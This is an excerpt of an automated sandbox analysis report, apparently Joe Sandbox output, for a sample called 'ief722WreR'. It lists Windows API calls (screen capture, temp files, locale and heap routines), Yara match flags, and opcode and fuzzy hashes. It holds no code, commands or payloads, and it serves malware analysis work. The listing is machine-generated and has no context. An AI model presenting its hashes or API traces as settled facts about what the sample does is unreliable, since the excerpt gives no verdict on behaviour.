                                                      • Opcode Fuzzy Hash: 07f8c7bf41114017428d2514f108cb7953daff0745a9299ad745c6acdc6e13f2
                                                      • Instruction Fuzzy Hash: 1AF0BB31680318BFDB126F61DC01FAEBB66EF04F12F90415AFD0567290DA719D21AA99
                                                      APIs
                                                        • Part of subcall function 0042E3ED: EnterCriticalSection.KERNEL32(?,?,00431C7A,?,00457A38,00000008,00431D48,?,?,?), ref: 0042E3FC
                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 00434E05
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                      • Instruction ID: 538c22e4eb892f32bc8c86ea5e443232934619ae82977abc573478e901e73d8c
                                                      • Opcode Fuzzy Hash: 47d67bb98ae687caab0f152daec36b922070e938420cb95d1256d2dc5184026a
                                                      • Instruction Fuzzy Hash: D4F04F32A103009FE710EF69D906B9D77E1AF05726F10416AF910DB2E2CB7999808F49
                                                      APIs
                                                        • Part of subcall function 024AE654: RtlEnterCriticalSection.NTDLL(02030DAF), ref: 024AE663
                                                      • EnumSystemLocalesW.KERNEL32(00434D87,00000001,00457BB8,0000000C), ref: 024B506C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                      • Instruction ID: 51751c5df23070daea4d4afeea8e2ce78f22671b216f8f8e3d5e9a705c77af24
                                                      • Opcode Fuzzy Hash: 149a1b447c4ca571c705eb83a82105c6c8b5f7f3924206eb96c0dadbe136b747
                                                      • Instruction Fuzzy Hash: F0F04932A20304DFEB10EF69D905B9D7BE1AF15721F10426AF914DB2E1CB799944CF4A
                                                      APIs
                                                        • Part of subcall function 00431EDA: GetLastError.KERNEL32(?,?,0042DFE5,00457910,00000010), ref: 00431EDE
                                                        • Part of subcall function 00431EDA: _free.LIBCMT ref: 00431F11
                                                        • Part of subcall function 00431EDA: SetLastError.KERNEL32(00000000), ref: 00431F52
                                                      • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,0043BA44,004307B5,?,?,?,?,?,004307B5,?,?,?), ref: 0043B2B9
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                      • Instruction ID: ec76e124c96d5fb6d75208995366108955e3ecd697e122142a5eb02f601840fd
                                                      • Opcode Fuzzy Hash: d795fd725da8cf926aceeb2c3e7fa24b7794cc6b9bd948e6377232035fe4f002
                                                      • Instruction Fuzzy Hash: C8F0553A30020897CB089F7BE81976BBF90EFC5754F0A409EEF098B290C3399942C794
                                                      APIs
                                                        • Part of subcall function 024B2141: GetLastError.KERNEL32(?,?,024AA9EC,?,00000000,?,024ACDE6,0248247E,00000000,?,00451F20), ref: 024B2145
                                                        • Part of subcall function 024B2141: _free.LIBCMT ref: 024B2178
                                                        • Part of subcall function 024B2141: SetLastError.KERNEL32(00000000,00000000,?,00451F20), ref: 024B21B9
                                                      • EnumSystemLocalesW.KERNEL32(0043B1D9,00000001,?,?,?,024BBCAB,024B0A1C,?,?,?,?,?,024B0A1C,?,?,?), ref: 024BB520
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem_free
                                                      • String ID:
                                                      • API String ID: 2016158738-0
                                                      • Opcode ID: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                      • Instruction ID: 94eb1a1080926b880cd2fcfe5aca514b8a473e9c33ffa5188d5fdf0a06bed6ba
                                                      • Opcode Fuzzy Hash: 17a3dc99c73c840853923c14692af3efa017a2bf6fb03d58d7281da58e8ea8e8
                                                      • Instruction Fuzzy Hash: D7F0E53A30020957CB099F3ADC557ABBF94EFC1754B5A405EEF0A8B290D7759942CBA0
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_00010672,0040FBF9), ref: 0041066B
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                      • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                      • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(00410672,0248FE60), ref: 024908D2
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                      • Instruction ID: fa39807fe97804f53db995cd18131740e6dead46809b56a5c9e59eb8483b0dbe
                                                      • Opcode Fuzzy Hash: b15aee9717d6502a1a2a20d9443c42d18a3a581c825a371cb40572de9e709067
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                      • Instruction ID: 646215492ee1b006629ac518ce4a11708067c45d14fae9e363609ac2be79142b
                                                      • Opcode Fuzzy Hash: b4ea6d87a370488c09fcd641e95d7d939a449e6ed78a54530fece2258cf524d5
                                                      • Instruction Fuzzy Hash: 3FA02230A00300EF8380CF30AE0830E3BE8BE03AC3B008238A002C3030EB30C0808B08
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                      • Instruction ID: 2844b30024e45351147ede59872166b67bb7d3639a7d84f230d679a3a0c0a750
                                                      • Opcode Fuzzy Hash: 833578221895711969fd992aca003b8dff0ac6b0b4e24d9bd8e499997b964946
                                                      • Instruction Fuzzy Hash: 32325761D69F014DE733A634C822336A258AFBB3D4F15E737E85AB5EA5EB2CC4834105
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                      • Instruction ID: d13affd36985adaba9549dda1076aa7943650852f65e7c6b0ce314185b1835a0
                                                      • Opcode Fuzzy Hash: 2dcf4a0559928c98f2b5d77cb0860f560abd3a2571bac000fbe95f0a84bb6040
                                                      • Instruction Fuzzy Hash: 88E18470A08612EFD714CF24C590AAAB7F1FF44304B54457EE846ABB81D738F862DB96
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                      • Instruction ID: b9dde2cb8ec5e47059e822cff3b1413f3dc4673ccaa64d593e325bcd1b1b7be9
                                                      • Opcode Fuzzy Hash: b270ae943b8fc30b0109646306f9a638257ad0854cfcd7f7143e4a79d383dfca
                                                      • Instruction Fuzzy Hash: 61D1C7322085A24EDB3D4A39847003FFFF1AA621A530D479FD8F7CA6C6EE24D595D660
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: b25d7b7a8e55bbee32d2fc67e28ff16be1cfeba2f71328b5531bdb6c5bdb1bbb
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: 6491647230D0B34ADB294679953443FFFE15E523A135A07DFE4F2CA2C1EE289964D624
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction ID: 5ac7f2a9e59a8602cade0463bed8eecf15c6b405b6f14f5b51fff65f5b8fc904
                                                      • Opcode Fuzzy Hash: 93657a121f16255c59120ad0d08fdbba6372c273009ad596b4ecdf6e8f3c6909
                                                      • Instruction Fuzzy Hash: C39136721090A34AE76E463E847513FFFE1DA612A530A079FD4F3CA2C5EF24D5A5DA20
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction ID: 19c93412fb5f9130a8e3bb0cb99d698500333008097130ff6794007c36a41420
                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction Fuzzy Hash: 6591943230A0B34EEB294279943403FFFE15A523A135A07DFD4F2CA2C5EE189565E628
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction ID: 69c8c12ab4cd9361c634d874c37384b1242b2d74bc424703cf95b13c0a97f286
                                                      • Opcode Fuzzy Hash: 05e0b846b00456d0f1e87463b9d189974beed2fe63262d4392584e128a114ea2
                                                      • Instruction Fuzzy Hash: 1E9152721090E34AEB69467E853413FFFE1DA622A530A07AFD4F2CA2C5FF24C565D620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: d2c87871af4d92e544e05363471dd483cf2102058027b34f35735ca62f395a82
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: 0691937230D0B34ADB2D467AA47403EFFE15A523B139A079FD4F2CB2C1ED18D6659628
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction ID: 1b0e5a1432efdb955494ef33638bab052ade4cd867fb28aa86128775c2a79699
                                                      • Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
                                                      • Instruction Fuzzy Hash: 649131722090A30AEB79463D857413FFEE19A611A570A079FE4F3CF2C5EF24D655D620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                      • Instruction ID: 543360d7dfb9058b4a8e0476cf2bcab449255d23345d35b398e8df16a867321f
                                                      • Opcode Fuzzy Hash: 4bd5393d4189e9aa91ad74f9bcbb8c764c0ecaf8bff73b58941f35d4311e138b
                                                      • Instruction Fuzzy Hash: 856154B1F0073876DA385A2CB892BBF63849F41748FE4041BE447DB381D69DDD82865E
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                      • Instruction ID: 5f9d72d340cd0d95e81e904500351da7244a860c49d46dc476b9cfacc41c856c
                                                      • Opcode Fuzzy Hash: f064d261a6db162a18988518e6412387d7217a2fbe5ef33d199751ee8f38446f
                                                      • Instruction Fuzzy Hash: 5B615435E00B04D6DB386A2888B0BBF6399AF75A08F44041FE893DBFD4D715D982CB55
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: 3d3f4059477c25f3e34474a921d34c240437fa272c48f742cc2d27251d9ebad1
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: E481737230D0B34AEB294679943843FFFE15A523A135A079FD4F2CA2C1EE188A64D624
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction ID: 40fef48657afa0c07b793ed553198580fd63280cf07076a7908ae453cb7e4604
                                                      • Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
                                                      • Instruction Fuzzy Hash: 2B8152722090E34AEB79467E847413FFFE15A621A630A079FD4F3CB2C5EF248665D620
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: e183cc42c0575e46eff71331dfd644b760227977963c57612164f9205c38e507
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: 631138773030B1A3D604862DF8B46BFA395EBE63217EC426FC0424B748CE6AE9C1950C
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction ID: b549e255c62728a56516a23b7752254fdb945a80926b464c3fcfcc8976473489
                                                      • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                      • Instruction Fuzzy Hash: B511277720104247D618CA3ED8B42BBE795FBE6228B2C567FD0514F758EB22E145D600
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676143282.0000000000AF9000.00000040.00000020.00020000.00000000.sdmp, Offset: 00AF9000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_af9000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction ID: 704771670929f8298fdd1f736728e61dc5e77a1719a4606374c45c7357fc8bbf
                                                      • Opcode Fuzzy Hash: 80fd216e43a3e8e10aa1bc4256d449f15122fb9386c352c6ac78bfc1f060c30f
                                                      • Instruction Fuzzy Hash: 61115E723401049FDB44DF95DC81FA773AAEB88320B298055FE08CB356D676E805CB60
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction ID: 34064763689ac3de6fc2931be55773beff4606bcf56ef1d504eadd77b2d196bf
                                                      • Opcode Fuzzy Hash: 4464db465ba34ef3b506432a1509cd0f617e3f47c711957a903ed9c1c8e80aab
                                                      • Instruction Fuzzy Hash: 2E01F272A306008FDF21EF20C905BBF33E5FB86306F0550A6D90A97381E370A8498B80
                                                      APIs
                                                      • DefWindowProcW.USER32(?,00000014,?,?), ref: 00402135
                                                      • GetClientRect.USER32(?,?), ref: 0040214A
                                                      • GetDC.USER32(?), ref: 00402151
                                                      • CreateSolidBrush.GDI32(00646464), ref: 00402164
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402178
                                                      • CreatePen.GDI32(00000001,00000001,00FFFFFF), ref: 00402183
                                                      • SelectObject.GDI32(00000000,00000000), ref: 00402191
                                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 004021A4
                                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 004021AF
                                                      • MulDiv.KERNEL32(00000008,00000000), ref: 004021B8
                                                      • CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000190,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000031,Tahoma), ref: 004021DC
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004021EA
                                                      • SetBkMode.GDI32(?,00000001), ref: 00402267
                                                      • SetTextColor.GDI32(?,00000000), ref: 00402276
                                                      • _wcslen.LIBCMT ref: 0040227F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: CreateObjectSelect$BrushCapsClientColorDeviceFontModeProcRectRectangleSolidTextWindow_wcslen
                                                      • String ID: Tahoma
                                                      • API String ID: 3832963559-3580928618
                                                      • Opcode ID: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                      • Instruction ID: 7336700d8ad07cb9e45a564d019af9580db2992b46b3f32d80e0fb6f80206702
                                                      • Opcode Fuzzy Hash: 06f3b736a1676dd81313cb3cb312b67037eb7e675966450ccfe924ee66f5f664
                                                      • Instruction Fuzzy Hash: F3710D72900228AFDB22DF64DD85FAEBBBCEF09751F0041A5B609E6155DA74AF80CF14
                                                      APIs
                                                      • DestroyWindow.USER32(?), ref: 004025CD
                                                      • DefWindowProcW.USER32(?,00000204,?,?), ref: 004025DF
                                                      • ReleaseCapture.USER32 ref: 004025F2
                                                      • GetDC.USER32(00000000), ref: 00402619
                                                      • CreateCompatibleBitmap.GDI32(?,-0045D5E7,00000001), ref: 004026A0
                                                      • CreateCompatibleDC.GDI32(?), ref: 004026A9
                                                      • SelectObject.GDI32(00000000,00000000), ref: 004026B3
                                                      • BitBlt.GDI32(00000000,00000000,00000000,?,?,?,00CC0020), ref: 004026E1
                                                      • ShowWindow.USER32(?,00000000), ref: 004026EA
                                                      • GetTempPathW.KERNEL32(00000104,?), ref: 004026FC
                                                      • GetTempFileNameW.KERNEL32(?,gya,00000000,?), ref: 00402717
                                                      • DeleteFileW.KERNEL32(?), ref: 00402731
                                                      • DeleteDC.GDI32(00000000), ref: 00402738
                                                      • DeleteObject.GDI32(00000000), ref: 0040273F
                                                      • ReleaseDC.USER32(00000000,?), ref: 0040274D
                                                      • DestroyWindow.USER32(?), ref: 00402754
                                                      • SetCapture.USER32(?), ref: 004027A1
                                                      • GetDC.USER32(00000000), ref: 004027D5
                                                      • ReleaseDC.USER32(00000000,00000000), ref: 004027EB
                                                      • GetKeyState.USER32(0000001B), ref: 004027F8
                                                      • DestroyWindow.USER32(?), ref: 0040280D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: Window$DeleteDestroyRelease$CaptureCompatibleCreateFileObjectTemp$BitmapNamePathProcSelectShowState
                                                      • String ID: gya
                                                      • API String ID: 2545303185-1989253062
                                                      • Opcode ID: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                      • Instruction ID: a73b2935a0a3d6b8847c17f141a4fcfbdcbb362899817371daa4de44eaa4c7d1
                                                      • Opcode Fuzzy Hash: 3cc899ee20bb76856f28d22ad06e46436276cc9c649a89ba50e82cf41c873628
                                                      • Instruction Fuzzy Hash: 1761A4B5900219AFCB249F64DD48BAA7BB9FF49706F004179F605A62A2D7B4C941CF1C
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3674170540.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_ief722WreR.jbxd
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                      • Instruction ID: 2b0db881b533507aa5a5d3a35fa702b665ff2bbaed3809dcc6a19b45feaeb0d0
                                                      • Opcode Fuzzy Hash: fcc1ee792fcce2b96d93b5348cd25e2762bf37b8f9e02b10d348c09b50046bbd
                                                      • Instruction Fuzzy Hash: C1B1DFB1A002159FEB11DF6AD881BEEBBF5FF08304F54446FE485A7342D779A9418B24
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.3676976121.0000000002480000.00000040.00001000.00020000.00000000.sdmp, Offset: 02480000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2480000_ief722WreR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                      • Instruction ID: 5e1dfd718b7591f1d46bb441e6ccfc8cf8dd2dd5689df997bbd09cf117d9b2ec
                                                      • Opcode Fuzzy Hash: 17cc7d2981949aec261f5402442bc47708264f4dc272fa138ea10e652b727814
                                                      • Instruction Fuzzy Hash: 42B18E71A002099FDB22DFB9C890BEEBBF5BF18304F14456EE4A5A7341D775A841DB60
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 0043A63C
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399A8
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399BA
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399CC
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399DE
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 004399F0
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A02
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A14
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A26
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A38
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A4A
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A5C
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A6E
                                                        • Part of subcall function 0043998B: _free.LIBCMT ref: 00439A80
                                                      • _free.LIBCMT ref: 0043A631
                                                        • Part of subcall function 0043346A: RtlFreeHeap.NTDLL(00000000,00000000,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?), ref: 00433480
                                                        • Part of subcall function 0043346A: GetLastError.KERNEL32(?,?,0043A0F8,?,00000000,?,00000000,?,0043A39C,?,00000007,?,?,0043A790,?,?), ref: 00433492
                                                      • _free.LIBCMT ref: 0043A653
                                                      • _free.LIBCMT ref: 0043A668
                                                      • _free.LIBCMT ref: 0043A673
